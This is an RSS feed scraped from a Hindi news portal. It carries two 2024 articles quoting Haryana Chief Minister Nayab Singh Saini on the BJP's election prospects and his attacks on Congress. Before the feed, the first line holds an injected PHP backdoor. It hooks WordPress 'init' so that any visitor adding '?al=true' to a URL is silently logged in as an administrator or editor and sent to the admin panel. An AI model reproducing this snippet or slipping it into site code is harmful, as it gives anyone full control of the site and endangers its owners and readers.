// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Chief Minister Saini – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 04 Oct 2024 20:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मुख्यमंत्री सैनी नवरात्रि के अवसर पर पंचकूला में मनसा देवी मंदिर में आए, कहा-प्रदेश में तीसरी बार बनेगी भाजपा सरकार https://pratyushaashakinayikiran.com/?p=79883 Fri, 04 Oct 2024 20:45:00 +0000 https://pratyushaashakinayikiran.com/?p=79883 पंचकूला
हरियाणा के मुख्यमंत्री नायब सिंह सैनी नवरात्रि के अवसर पर पंचकूला में मनसा देवी मंदिर में आए। इस अवसर पर उन्होंने मीडिया से बात करते हुए हरियाणा सरकार द्वारा जनता के लिए किए गए कार्यों पर बात करते हुए विधानसभा चुनाव में भारतीय जनता पार्टी (भाजपा) की जीत के प्रति पूरा भरोसा व्यक्त किया। नायब सिंह सैनी ने कहा, “आज मेरा परम सौभाग्य है कि मैं और हमारे पार्टी के अध्यक्ष मोहन लाल कौशिक नवरात्रि के अवसर पर प्रदेश की सुख समृद्धि के लिए मां मनसा देवी के चरणों में आज हाजिरी लगाने के लिए आए हैं। मैं नवरात्रों के महापर्व पर सभी प्रदेशवासियों और देशवासियों को बहुत बहुत बधाई और शुभकामनाएं देता हूं। यह पर्व हमारी संस्कृति के साथ संस्कारों के साथ जुड़े हुए हैं। मैं सभी के लिए मंगल कामना और उज्जवल भविष्य की कामना करता हूं। यह प्रदेश विकास की नई ऊंचाइयों को छुए ऐसी मैं माता रानी से प्रार्थना करता हूं।”

उन्होंने प्रदेशवासियों से 100 प्रतिशत मतदान करने की भी अपील की और कहा, “ज्यादा से ज़्यादा संख्या में घरों से निकल कर लोकतंत्र की मजबूती के लिए मतदान करें। ऐसा मैं प्रदेश के लोगों से प्रार्थना करता हूं। हरियाणा में भाजपा के केंद्रीय नेतृत्व ने आकर के लोगों के बीच में इंटरेक्शन किया है प्रदेश का आज एक पॉजिटिव माहौल बना है। लोग पीएम नरेंद्र मोदी के तत्वाधान में प्रदेश को तीव्र गति से विकास की नई ऊंचाइयों के ऊपर पहुंचाने के लिए तैयार हैं। हमने अपने सरकार के विजन को प्रदेश के लोगों के सामने रखा है जिसे जनता ने स्वीकार भी किया है। हमें पूर्ण विश्वास है भारतीय जनता पार्टी हरियाणा में तीसरी बार बहुत बड़े बहुमत के साथ सरकार बना रही है।”

उन्होंने आगे कहा कि हमने पिछले 10 वर्षों में जो लोगों के हित में, जो प्रदेश के हित में जितने भी कदम उठाए हैं, वह कदम प्रदेश की मजबूती को, प्रदेश को ऊंचाइयों के ऊपर पहुंचाने के उठाए हैं। लोगों को उनका जबरदस्त लाभ मिला है। हरियाणा पिछले 10 वर्षों के अंदर विकसित हरियाणा बना है। आने वाले समय के अंदर हमने यह संकल्प लिया है कि हरियाणा को तीव्र गति से विकास की और ऊंचाइयों पर पहुंचाने का काम हमारी सरकार करेगी। जो भी सुविधाएं लोग प्रदेश के लोगों को चाहिए या उनकी तरफ से जो सुझाव आएंगे, उन सुझावों के ऊपर काम करते हुए हरियाणा को आगे बढ़ाने का काम करेंगे।

सैनी ने अशोक तंवर के कांग्रेस पार्टी में शामिल होने पर कहा, “अशोक तंवर कई पार्टियों में रहे हैं। उन्होंने सभी पार्टियों का स्वाद चखा है। उन्होंने कुछ सोचा होगा, ठीक सोचा होगा। परंतु प्रदेश के लोग जानते हैं सभी पार्टियों स्वाद उन्होंने चखा है।” उन्होंने कहा, “हमने पिछले 10 वर्षों के अंदर बड़े निर्णय लिए हैं। आज हरियाणा के 15 जिलों में मेडिकल कॉलेज खड़े हुए हैं। 8 तारीख के बाद जो शेष बच्चे हैं वह भी खड़े हो जाएंगे। तेजी से काम चल रहा है। 22 जिलों में पिछले दस वर्षों में हर बीस किलोमीटर के ऊपर बेटियों के लिए कॉलेज खड़ा हुआ है। चाहे यूनिवर्सिटी बनाने की बात हो, चाहे हरियाणा के अंदर आईटीआई बनाने की बात हो, हमने पिछले दिनों फैसला लिया की हरियाणा देश का पहला ऐसा राज्य बन गया है जो अपने किसान की 24 फसलों को एमएसपी पर खरीदने का काम कर रहा है। यह हमारे लिए एक संकल्प है कि हम हरियाणा के युवाओं को बिना पर्ची बिना खर्ची के रोज़गार देने का काम करेंगे।”

इसके अलावा उन्होंने कांग्रेस पार्टी में फूट और दलितों के प्रति संकीर्ण मानसिकता की बात की। उन्होंने कहा कि राहुल गांधी ने आकर लोगों के हाथ मिलाने की जो कोशिश की है, वह भी नाकाम है। लोगों के सिर्फ हाथ मिले हैं, लेकिन दिल नहीं मिले हैं। कांग्रेस ने दलित समाज को अपमानित करने का काम किया है और यह पार्टी की परपंरा रही है क्योंकि ऐसा करना इनके डीएनए में है।

 

]]>
मुख्यमंत्री सैनी ने कहा- हिमाचल प्रदेश, कर्नाटक और तेलंगाना में कांग्रेस द्वारा किए गए बड़े-बड़े वादों के हश्र से वाकिफ हैं https://pratyushaashakinayikiran.com/?p=73761 Sun, 22 Sep 2024 22:25:00 +0000 https://pratyushaashakinayikiran.com/?p=73761 हरियाणा
हरियाणा के मुख्यमंत्री नायब सिंह सैनी ने कहा कि लोग हिमाचल प्रदेश, कर्नाटक और तेलंगाना में कांग्रेस द्वारा किए गए बड़े-बड़े वादों के हश्र से वाकिफ हैं, लेकिन उनके राज्य में पार्टी का “झूठ” नहीं चलेगा.सैनी ने भरोसा जताया कि हरियाणा में पांच अक्टूबर को प्रस्तावित विधानसभा चुनावों में भारतीय जनता पार्टी (बीजेपी) पूर्ण बहुमत के साथ फिर से सरकार बनाएगी. उन्होंने कहा कि पार्टी राज्य में जारी विकास कार्यों में तेजी लाएगी.
 
कैथल जिले के सीवन में एक चुनावी रैली को संबोधित करने के बाद ‘पीटीआई-भाषा’ से बातचीत में सैनी ने कहा, “जैसा कि आप देख सकते हैं, लोगों में जबरदस्त उत्साह है. बीजेपी तीसरी बार सरकार बनाएगी, वो भी पूर्ण बहुमत के साथ.” मुख्यमंत्री ने शनिवार को गुहला क्षेत्र से बीजेपी प्रत्याशी कुलवंत बाजीगर के पक्ष में आयोजित रैली को संबोधित किया.

'लोगों को गुमराह करना उनके लिए कोई नयी बात नहीं'
उन्होंने कांग्रेस पर निशाना साधते हुए कहा कि चुनाव से पहले हिमाचल, कर्नाटक और तेलंगाना के लोगों से किए गए बड़े-बड़े वादों के बारे में हर कोई जानता है. सैनी ने आरोप लगाया, “सत्ता हथियाने के लिए झूठ बोलकर लोगों को गुमराह करना उनके लिए कोई नयी बात नहीं है.” उन्होंने कहा, “पड़ोसी राज्य हिमाचल प्रदेश का ही उदाहरण ले लीजिए. युवाओं को सालाना एक लाख नौकरियां, महिलाओं को प्रति माह 1,500 रुपये और हिमाचल में मुफ्त बिजली देने के कांग्रेस के वादे का क्या हुआ? क्या उन्होंने इन वादों को पूरा किया.”

'हरियाणा के लोग कांग्रेस के झूठे वादों का हश्र जानते हैं'
सैनी ने कहा, “हरियाणा के लोग कांग्रेस के झूठे वादों का हश्र जानते हैं. उनका झूठ यहां नहीं चलेगा.” उन्होंने कहा कि कांग्रेस के “झूठे” वादों के विपरीत बीजेपी जो कहती है, उसे पूरा करती है. हरियाणा में कांग्रेस ने सत्ता में आने पर 18 से 60 साल की महिलाओं को प्रति माह 2,000 रुपये की आर्थिक मदद देने और 500 रुपये में गैस सिलिंडर उपलब्ध कराने का वादा किया है. वहीं, बीजेपी के चुनावी वादों में महिलाओं के लिए हर महीने 2,100 रुपये की आर्थिक सहायता, युवाओं के लिए दो लाख सरकारी नौकरियां और राज्य के अग्निवीरों के लिए सरकारी नौकरी की गारंटी शामिल है.

]]>